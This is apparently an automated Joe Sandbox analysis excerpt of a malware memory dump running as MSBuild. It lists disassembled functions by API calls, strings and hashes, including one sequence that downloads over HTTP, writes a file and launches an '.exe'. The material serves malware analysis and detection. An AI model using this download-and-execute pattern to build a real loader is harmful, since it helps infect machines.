Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 88e3ebeed86e24cc7b28056dd658e9d3a29e958a980414936145912d381853e6
Instruction ID: f591e2a0d8e138dca35be3644fb2135853aaa162620cf24645ece741f6493c3d
Opcode Fuzzy Hash: 88e3ebeed86e24cc7b28056dd658e9d3a29e958a980414936145912d381853e6
Instruction Fuzzy Hash: 6D810F72A001199BCF01FBA6DE469DDB775AF04309F51003AF500B71A1DBB9AE898B99

Function 00425261 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00425294
_siglookup.LIBCMT ref: 004252BB
DecodePointer.KERNEL32(00000000), ref: 00425313
__lock.LIBCMT ref: 0042533A

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID:
API String ID: 2847133137-0
Opcode ID: 566fb7a9ce621392c45170995ac80ea6371b7fc17e128289bbc3db9a78952912
Instruction ID: 163363832fae9a4e463df0ece09c03a68562d95583d470f652ab41388aeef822
Opcode Fuzzy Hash: 566fb7a9ce621392c45170995ac80ea6371b7fc17e128289bbc3db9a78952912
Instruction Fuzzy Hash: 01416D70F00B25CBCB24DF69E8845AEB7B0AB45355BA4512BE801A7391C7B89841CB6C

Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004122D7

Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
CloseHandle.KERNEL32(00000000), ref: 00412392

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 619fb392ac4ef57c4e8cdd80c22c9e9be590902abe43c93c1cd9ada057c809bb
Instruction ID: 4908dc3ae55921e5dd248142a0999099d01d310cdfe30bf9d66c42b4d563b095
Opcode Fuzzy Hash: 619fb392ac4ef57c4e8cdd80c22c9e9be590902abe43c93c1cd9ada057c809bb
Instruction Fuzzy Hash: BD314F72A0121CAFDF219F60DD849EEB7BDEB0A345F0400AAF909E2550D6395F848F56

Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
HeapAlloc.KERNEL32(00000000), ref: 00410CDF
GetLocalTime.KERNEL32(?), ref: 00410CEB
wsprintfA.USER32 ref: 00410D16

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 5c7da9d774efdaa0fdd76bf82abc7e5b87a86e22502ea334df05fc1f96782480
Instruction ID: 829b10f54598a7ff4258e043d4963b9d7c9dabd005c17a1734c4fecc941c9070
Opcode Fuzzy Hash: 5c7da9d774efdaa0fdd76bf82abc7e5b87a86e22502ea334df05fc1f96782480
Instruction Fuzzy Hash: 22F031B2900218BBDF14DFE59C059BF77BCAB0C716F001095F941E2180E6399A80D775

Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction ID: 87089636491fbed30b1748ff62e0772d8b8c37abbef2c6f1f22f5f972430845f
Opcode Fuzzy Hash: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction Fuzzy Hash: 29F0A731641314FBFB14D7A0DD09FDA7AADEB08761F200250FE01E61D0D7B06F818669

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: d7da8e02d0e8d8ed0478b8530d5419cd36353aa48a2fc0a0fd73fe35502d9329
Instruction ID: 607805de85d34077ac8010c86c96324dc0739edf941e59843d4d701679f3259e
Opcode Fuzzy Hash: d7da8e02d0e8d8ed0478b8530d5419cd36353aa48a2fc0a0fd73fe35502d9329
Instruction Fuzzy Hash: A3417372E00109BBDF11FBA6ED42ACE7775AF44308F510076F500B7191DAB86E8A8BD9

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 5bd3c72e2a2c28d7f98c1eadb8a5e2855416913c1cc93355d95e2efce2546025
Instruction ID: b8e333327a8be3efb5a61452340683a7f3e77127bc94f8cc85e467c2da99d15f
Opcode Fuzzy Hash: 5bd3c72e2a2c28d7f98c1eadb8a5e2855416913c1cc93355d95e2efce2546025
Instruction Fuzzy Hash: B611A375300201ABDB24DF2DD941929B369FF85354714413FF801ABBC2C779ED69C69A

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 11bcbbf4e3385ff2571c5c45c4b2439a3f96e274cabb5125d6892df765bbcaf0
Instruction ID: 943bf7d0d5a8fabe028b1a780fc3b1132d50164a8b8b874ee1f3eb6896142e72
Opcode Fuzzy Hash: 11bcbbf4e3385ff2571c5c45c4b2439a3f96e274cabb5125d6892df765bbcaf0
Instruction Fuzzy Hash: 0611E131304210EBDB24DE6CD9809697365AF45324744067BF815EFAC2C33CED458B9A

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 8d6f190ab6b2ba40715b33eca56b8a5e9ffc43c45ee1a123cf25a47b4358ef61
Instruction ID: af76378122cbc654785c4284bc1f2564db1dd501434687a4ca840133f71d0007
Opcode Fuzzy Hash: 8d6f190ab6b2ba40715b33eca56b8a5e9ffc43c45ee1a123cf25a47b4358ef61
Instruction Fuzzy Hash: 4601AD713107418BD7348E7899C491FB2A2EB85B20730493ED982D7B85DB7CE84E8798

Function 004282E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004282FE
__invoke_watson.LIBCMT ref: 00428352

Part of subcall function 0042818D: _strcat_s.LIBCMT ref: 004281AC

Strings

,NC, xrefs: 0042833D

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 6e4e6a371cba90ef9ebeeb0ca97326c2cbf7688855193e91cf68080b76189653
Instruction ID: 9fd3745167120440bfdedbbf8520646eac0ac106fd9ee082a2a4634a1cd760c1
Opcode Fuzzy Hash: 6e4e6a371cba90ef9ebeeb0ca97326c2cbf7688855193e91cf68080b76189653
Instruction Fuzzy Hash: 9EF0F4725412187FDB116EA09C43EEF3B5AAF00354F88805AFD1886191DA379D60C754

Function 0042818D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcat_s.LIBCMT ref: 004281AC
__invoke_watson.LIBCMT ref: 004281C8

Strings

`8C, xrefs: 0042819E, 004281A4

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s
String ID: `8C
API String ID: 228796091-1339866851
Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction ID: d641333d3b05eb37c220185af6f0ca3676d28bda76794771061db1e67d1cdd83
Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction Fuzzy Hash: D9E09273601219ABDB111E56EC419EF7719FFC0368B45043AFD1852001DB3699A29694

Function 0041F4D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F50E
DName::DName.LIBCMT ref: 0041F51A

Strings

{flat}, xrefs: 0041F509

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: 71cdc5086ad98bd25e234238e95b4002ba9000919263a4584fe9e931f4e7c874
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 84F0A031144208AFCB10EF58D415BE53BA1AF4575AF08805AF94C4F393D774E8C2C799

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: 7d61576bc23e6c09f31e39ad3bd34650203f811b8cd45cb545fdcfe0ae16857c
Instruction ID: 7279cf6f1f22d2a2ba8e3215006abc5fc6e9ec8f7915935b92b5a6e75ca34a4d
Opcode Fuzzy Hash: 7d61576bc23e6c09f31e39ad3bd34650203f811b8cd45cb545fdcfe0ae16857c
Instruction Fuzzy Hash: 8EE0E0F1D1020C9BDB14DFA5E946F5DB7F89B04704F5000299A05E7181E678BB098B59

